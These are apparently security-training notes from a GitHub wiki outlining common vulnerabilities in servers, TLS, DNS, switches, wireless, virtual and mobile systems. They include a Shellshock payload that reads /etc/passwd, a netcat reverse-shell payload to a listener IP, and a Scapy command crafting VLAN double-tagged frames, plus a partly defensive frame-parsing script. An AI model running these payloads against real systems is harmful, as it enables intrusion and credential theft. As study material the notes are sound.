Common Vulnerabilities - Paiet/Tech-Journal-for-Everything GitHub Wiki

Common Vulnerabilities Pt.1

  • Servers/Endpoints
    • Missing Patches
    • Unsupported OS and/or Apps
    • Buffer Overflows
    • Priv Esc
    • Arbitrary Code Execution - Remote Code Execution
      • Shellshock Demo
        • In "User Agent" field
        • Test for Shellshock
          • () { :;}; echo $(</etc/passwd)
        • Start listener
        • () { :;}; /usr/bin/nc -nv 192.168.55.196 9999 -e /bin/bash

Common Vulnerabilities Pt.2

  • Insecure Protocol use
    • FTP
    • Telnet
  • Debugging Modes
    • Used to help devs troubleshoot issues
    • May leak critical info
      • Database info
      • Authentication mechanisms
  • Network infrastructure
    • SSL/TLS issues
      • They are not the same
        • SSL is compromised and insecure
        • TLS is the replacement for SSL
      • The latest version should be used
        • Sometimes older versions are kept for backward compatibility
    • Insecure ciphers
      • Not all cipher suites are made equally
      • Cipher negotiation
        • Client contacts server and requests a secure connection
          • ClientHello message
          • List of supported ciphers sent to server
        • Server responds with ServerHello message
          • Defines the cipher that will be used for the conversation
          • Typically uses the most secure cipher that both client and server support
      • nmap --script ssl-cert,ssl-enum-ciphers -n -p 443 nicholas.com
    • Certificate issues
      • Cert name and server name mismatch
        • Could be a fake cert taken from a legit site
      • Cert expiration
        • Probably just forgot to renew
      • Unknown CA
        • Can you trust certs from a CA that isn't known?
          • If they're yours, yes
    • DNS
      • All the oldies but goldies
        • patches, buffer overflows, code exec, etc.
      • Amplification attacks
        • Attacker sends DNS requests with the source IP spoofed to the target/victim
        • Requests are small, but replies are much bigger
        • Replies are sent to the victim
          • Isn't DoS fun
    • Internal IP Disclosure
      • Helps attackers map internal systems behind the firewall
      • Can see these show up in HTTP headers

Common Vulnerabilities Pt.3

  • Network appliances
    • Load balancers
    • Firewalls
    • Routers
    • Switches
      • VLAN Double-Tagging
        • Adding a second VLAN tag to the Ethernet frame
        • Allows you to perform a VLAN Hopping attack
        • Attacker must be on the native VLAN
      • VLAN Hopping
        • Because of the double-tagged frame
          • SwitchA receives the double-tagged frame and strips off the first (outer) tag
            • Frames for the native VLAN cross the trunk untagged, so the outer tag is not re-added
          • SwitchA forwards the frame to SwitchB over the trunk link
          • SwitchB sees the inner tag for the desired VLAN and forwards the frame to the victim
      • Craft attack with Scapy
        • sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:50:56:39:25:60')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='255.255.255.255', src='192.168.1.204')/ICMP(), iface='eth1')
        • Breakdown of the command
          • Source MAC address: 00:50:56:39:25:60
          • Destination MAC address: broadcast
          • Inner VLAN tag: 20
          • Outer VLAN tag: 1
          • Destination IP address: broadcast
          • Source IP address: 192.168.55.204
          • Outgoing interface: eth1
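As an added illustration of the double-tagging mechanism described above (example code written for these notes, not taken from them or from Scapy), the stdlib-only Python below assembles a constructed frame with the MACs and VLAN IDs from the Scapy line, parses its 802.1Q tag stack, models SwitchA dropping the native-VLAN tag so that SwitchB only sees VLAN 20, and gives a check a defender can run over frames captured on an access port to flag the pattern. A native VLAN of 1 and the dummy IPv4 payload are assumptions.

```python
import struct

ETH_P_8021Q = 0x8100  # TPID of an 802.1Q tag
ETH_P_IP = 0x0800     # EtherType of the IPv4 payload after the last tag
NATIVE_VLAN = 1       # assumed native VLAN of the trunk (outer tag in the notes)

def _mac(text):
    return bytes(int(octet, 16) for octet in text.split(":"))

def build_frame(dst, src, vlan_ids, payload=b"\x45" + b"\x00" * 19):
    """Constructed sample input: Ethernet addresses, one 802.1Q tag per VLAN ID
    (outer first), then the IPv4 EtherType and a dummy 20-byte IPv4 header."""
    hdr = _mac(dst) + _mac(src)
    for vid in vlan_ids:
        hdr += struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF)  # PCP/DEI bits left 0
    return hdr + struct.pack("!H", ETH_P_IP) + payload

def parse_tags(frame):
    """Walk the header after the MAC addresses and return VLAN IDs, outer to inner."""
    tags, off = [], 12
    while off + 4 <= len(frame):
        ethertype, tci = struct.unpack_from("!HH", frame, off)
        if ethertype != ETH_P_8021Q:
            break
        tags.append(tci & 0x0FFF)  # low 12 bits of the TCI are the VLAN ID
        off += 4
    return tags

def switch_a_forwards(frame, native_vlan=NATIVE_VLAN):
    """Model SwitchA: a frame tagged with the native VLAN goes over the trunk
    untagged for that VLAN, so the outer 4-byte tag is removed and the inner
    tag is left intact for SwitchB to act on."""
    tags = parse_tags(frame)
    if tags and tags[0] == native_vlan:
        return frame[:12] + frame[16:]
    return frame

def is_double_tag_attempt(frame, native_vlan=NATIVE_VLAN):
    """Defender check for frames captured on an access port: two stacked tags
    with the outer one equal to the native VLAN is the VLAN hopping pattern."""
    tags = parse_tags(frame)
    return len(tags) >= 2 and tags[0] == native_vlan

if __name__ == "__main__":
    frame = build_frame("ff:ff:ff:ff:ff:ff", "00:50:56:39:25:60", [1, 20])
    print(parse_tags(frame), is_double_tag_attempt(frame))  # [1, 20] True
    print(parse_tags(switch_a_forwards(frame)))              # [20]
```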

Common Vulnerabilities Pt.4

  • Wireless AP
    • No security or poor security
      • Still using default settings
        • SSID
        • Username:Password
      • Employing weak password
      • Employing weak encryption
    • Insecure physical access
      • Located in break room on top of cabinet
    • Rogue Access Points
      • Users unintentionally send sensitive data through the rogue AP
    • Evil Twin
    • Session Hijacking
    • Man-In-The-Middle
    • DoS

Common Vulnerabilities Pt.5

  • Virtual infrastructure
    • VM Escape
    • Virtual hosts
      • Patching
    • Virtual networks
      • Same as real networks
    • Management interface
      • Super sensitive
      • Employ strong authentication/access methods
        • 2FA/MFA
        • Firewall/ACLs
        • No public access
        • Jump Box/SAW
  • Mobile devices
    • Malware
    • Device vulns
      • Unpatched OS
      • Jailbroken/Rooted
        • Allows sideloaded apps
        • Could install malware
    • Lost/Stolen
      • Taken everywhere (hence the term "mobile")
      • Inviting target for thieves
      • 70 million smartphones lost each year
        • Only 7% recovery
    • Communication interception
      • They tend to get connected to insecure networks
  • Interconnected networks
    • Virtual Private Networks (VPNs)
      • Check for current patching
      • Check for use of insecure ciphers
  • Industrial Control Systems (ICSs) and SCADA devices
    • Buffer overflows
    • Authentication bypass
    • Hard-coded creds
    • Insecure protocols/Cleartext data
  • CSRF
  • XSS
  • Unrestricted File Upload
  • SQLi